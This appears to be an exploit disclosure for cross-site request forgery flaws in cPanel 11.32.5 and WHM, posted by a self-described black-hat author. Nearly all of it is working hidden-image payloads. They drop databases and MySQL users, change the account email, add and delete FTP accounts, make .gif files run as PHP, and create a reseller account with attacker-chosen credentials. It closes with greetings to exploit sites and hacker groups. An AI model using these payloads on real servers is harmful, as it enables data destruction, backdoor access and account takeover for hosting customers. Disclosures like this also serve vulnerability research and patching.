==============================================================================
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Vulnerability: CSRF
Vendor: cpanel.net
==============================================================================
=====================================================================
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Aka: Cpanel Accelerated 2
via
WHM 11.32.5 (build 11)
=====================================================================
CSRF: Drop Database: (Method $_GET)
<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" />
Here we are going to drop database named: armenian_music
=====================================================================
CSRF: Drop mysql user: (Method $_GET)
<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />
Here we are going to drop mysql user named: armenian_adserver ))
=====================================================================
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)
Changing email address to: owned_and_owned_again@gmail.tld
<img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=¬ify_disk_limit=1¬ify_bandwidth_limit=1¬ify_email_quota_limit=1" heigth="0" width="0" />
=====================================================================
CSRF adding FTP account:
username: akastep
password: akastep
host is target host.
<img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/"a=0&cache_fix=owned_by_akastep" heigth="0" width="0" />
=====================================================================
CSRF Drop FTP account:
Deletes existent ftp account named: axaxa
<img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" />
=====================================================================
CSRF change Apache handler:
(Parse .gif file as php script)
<img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" />
=====================================================================
CSRF Delete handler:
<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" />
=====================================================================
WHM 11.32.5 (build 11)
CSRF: Add Reseller+setup
with domain: owned.com
username: owned111
password: MYVERYSTRONGGOESHERE
And contact email: owned@owned1.you
<img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default"a=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" />
=====================================================================
================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua
to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
